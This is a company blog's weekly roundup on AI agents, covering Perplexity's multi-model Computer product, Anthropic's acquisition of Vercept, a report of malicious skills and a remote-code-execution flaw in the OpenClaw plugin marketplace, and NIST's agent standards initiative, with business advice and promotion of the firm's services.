AI Agents This Week: Products, Acquisitions, and Risks
Ricardo Argüello — February 26, 2026
CEO & Founder
General summary
In one week, Perplexity launched a commercial agent orchestrating 19 models, Anthropic acquired a computer-operating agent startup, and a security report found 340+ malicious skills in a popular open-source agent marketplace. AI agents now have price tags, acquisition multiples, and real attack vectors.
- Perplexity Computer orchestrates 19 AI models to execute full tasks, available at $200/month
- Anthropic's acquisition of Vercept signals that value is shifting from base models to the application layer
- Over 340 malicious skills were found in the OpenClaw marketplace — open-source agents need security vetting before deployment
- NIST launched agent standards that will become compliance requirements for companies selling to the U.S. government
- These developments mark the transition from AI agents as demos to agents as real products with real risks
Imagine three things happening in the same week: a company starts selling an AI assistant that can actually do tasks on your computer, another company buys a startup to make their AI better at operating software, and security researchers find hundreds of dangerous plugins hiding in a popular AI tool store. That's what just happened — AI agents went from 'interesting concept' to products you can buy, invest in, and get attacked through.
AI-generated summary
This Week, AI Agents Stopped Being Demos
Three things happened in 48 hours that would have taken months a year ago. Perplexity launched a commercial product orchestrating 19 AI models to execute full tasks. Anthropic acquired a startup specializing in agents that operate computers. And a security report revealed that the plugin marketplace of one of the most popular open-source agents contains over 340 malicious skills.
AI agents are no longer a keynote promise. They’re products with price tags, eight-figure corporate acquisitions, and — predictably — real attack vectors. At IQ Source, we track these stories weekly because they directly affect the technology decisions of the companies we work with. Here’s our read on what happened and why it matters.
If you’re still figuring out how AI agents fit into your operations, our practical agent playbook for decision-makers gives you the full framework.
Perplexity Computer: 19 Models, One Command
On February 25, Perplexity announced Computer, a system that goes beyond search: it executes complete tasks on your computer. The user describes what they want — “organize last month’s expenses into a spreadsheet” — and the system plans the steps, selects the right models, and executes.
What’s interesting isn’t that an agent can operate a computer. Anthropic demonstrated that with Claude computer use. What makes Perplexity Computer different is multi-model orchestration. Instead of asking one model to do everything, the system assigns each part of the task to the model best suited for it.
Which Model Does What
| Model | Role |
|---|---|
| Claude Opus 4.6 | Complex reasoning and task planning |
| Gemini | Research and information synthesis |
| Nano Banana Pro | Image generation and editing |
| Sonar (Perplexity’s own) | Real-time web search |
| Additional models | Code, document analysis, data processing |
The price: $200/month on the Max tier, with 10,000 monthly credits. According to PYMNTS, tasks cost between 1 and 5 credits depending on complexity.
What This Means for B2B Companies
The multi-model orchestration pattern is exactly what we described in our enterprise agents playbook: don’t use one model for everything — use the right one for each step. Perplexity is packaging that pattern as a consumer product.
For enterprises, the difference is that you can’t route client data, contracts, or financial information through a $200/month SaaS product without security controls, audit trails, or regulatory compliance. The orchestration pattern is sound. The implementation requires your own models, your own infrastructure, and your own rules.
Anthropic Acquires Vercept: The Bet on Computer-Operating Agents
The same day Perplexity launched Computer, TechCrunch reported that Anthropic acquired Vercept, a San Francisco startup that built “Vy” — an agent capable of operating Mac computers remotely, including opening applications, using interfaces, and executing complete workflows without human intervention.
Vercept had raised $50 million from investors including Spark Capital and Y Combinator, with notable angels from the AI ecosystem. The entire team joined Anthropic, and Vercept will shut down operations on March 25.
This isn’t the first time Anthropic has bought talent instead of building in-house. In December they acquired the Bun team, the JavaScript runtime. The pattern is clear: Anthropic is assembling the full stack for AI agents — from the base model to the execution layer that interacts with the real world.
For companies planning their integration strategy, this acquisition reinforces what we’ve been saying: the market is moving toward agents that operate software directly. But the cleanest, most controllable path for most enterprises is still connecting agents to their systems through APIs and standardized protocols like MCP, not having an agent drive the GUI. If you want to explore that route, we have a team dedicated to MCP server development that connects agents to enterprise systems securely.
OpenClaw: What Happens When Security Can’t Keep Up
While Perplexity and Anthropic made their announcements, a less glamorous but more urgent report was circulating in the security community. OpenClaw — the open-source agent that went viral and amassed millions of installations, whose founder recently joined OpenAI — has a serious security problem in its plugin ecosystem.
According to a CNBC analysis based on Cisco research, the OpenClaw skills marketplace is compromised in multiple ways:
- 341+ malicious skills identified — roughly 20% of the total marketplace. They include code that exfiltrates user data, installs backdoors, or redirects queries to external servers.
- CVE-2026-25253 (CVSS 8.8) — a remote code execution vulnerability that allows an attacker to run arbitrary commands on the user’s machine through a seemingly legitimate skill.
- 30,000+ exposed instances — according to The Hacker News, tens of thousands of OpenClaw installations are accessible from the internet without authentication, exposing data and enabling remote execution.
- Exfiltration via messaging — some skills send user data to Slack channels, Discord, or external webhooks without the user’s knowledge.
Why This Matters for Your Company
OpenClaw is a real-time case study of what happens when an agent ecosystem grows faster than its security controls. And it’s not an isolated case — it’s a preview of what can happen with any agent platform that allows third-party extensions without rigorous review.
For B2B companies, the lesson is direct: when evaluating AI agents, the security review can’t stop at the base agent. You need to audit every plugin, skill, or extension connected to the system. This applies to open-source tools and commercial products with integration marketplaces alike.
If your team is already using or evaluating AI code generation tools, our guide on AI-generated code security covers the controls you should have in place.
NIST Puts the Rules on the Table
While the industry builds and acquires at full speed, the U.S. government started bringing order. On February 17, NIST launched an AI agent standards initiative through its Center for AI and Security Intelligence (CAISI).
The initiative has three pillars: industry-led interoperability standards, open-source protocols for agent communication, and security and identity research for autonomous systems. According to SiliconANGLE, NIST published a Request for Information (RFI) on agent security with a March 9 deadline.
This isn’t academic theory. For any company selling to the federal government, defense contracts, or regulated industries like healthcare and finance in the U.S., NIST standards become compliance requirements. If you’re building or deploying agents today, it’s worth designing with these frameworks in mind — building ahead is cheaper than retrofitting later.
What All of This Means for Your Company
Agents are products, not prototypes. Perplexity is selling access to a multi-model agent for $200/month. Anthropic paid tens of millions to acquire an agent team. The market has decided that AI agents are the next layer of enterprise software — the question for your company isn’t whether to adopt them, but how and with what controls.
Agent security is your problem. OpenClaw proved that a plugin marketplace can become a massive attack vector within months. If your team uses or plans to use agents with third-party extensions — and nearly every AI agent has them — you need a security review process that covers not just the base agent but every integration. The story of WebMCP and open standards for web agents, which we covered in our WebMCP standard analysis, shows why open protocols are preferable to closed plugin ecosystems.
Standards are coming — build forward, not backward. The NIST initiative signals that the regulatory framework for AI agents is on its way. Companies that design their implementations with auditing, traceability, and access controls from day one will spend less on adaptations when standards are finalized. Those that don’t will face costly rework.
This kind of weekly analysis is what we do at IQ Source to keep up with a fast-moving ecosystem. If your leadership team needs this read tailored to your industry and specific technology decisions, let’s talk.
Frequently Asked Questions
It's an autonomous agent system that orchestrates 19 AI models to complete complex tasks. The user describes a desired outcome, and the system plans, executes, and delivers. It's available on the Max tier at $200/month with 10,000 monthly credits.
Because value is shifting from base models to application layers. Training large models is becoming a commodity; differentiation comes from the ability to take real actions — reading screens, operating software, interacting with systems. Acquisitions aim to integrate these capabilities directly into existing AI products.
Key risks include unaudited dependencies, excessive permissions, and missing access controls designed for enterprise environments. An open-source agent may work technically but lack logging, action limits, and isolation that any corporate deployment requires. Security evaluation should happen before deployment, not after.
NIST launched an initiative with three pillars: industry-led standards, open-source protocols, and security and identity research for agents. If your company sells to U.S. government or regulated industries, these will become compliance requirements. The public comment deadline is March 9.
Related Articles
LiteLLM Attack: Your AI Trust Chain Just Broke
LiteLLM, the AI API key proxy with 97 million monthly downloads, was poisoned via PyPI. Your security scanner was the entry point.
Google Stitch + AI Studio: Design-to-Code Without Engineers
Google shipped a full design-to-production pipeline with Stitch and AI Studio. Where it works for B2B prototypes and where you still need real engineering.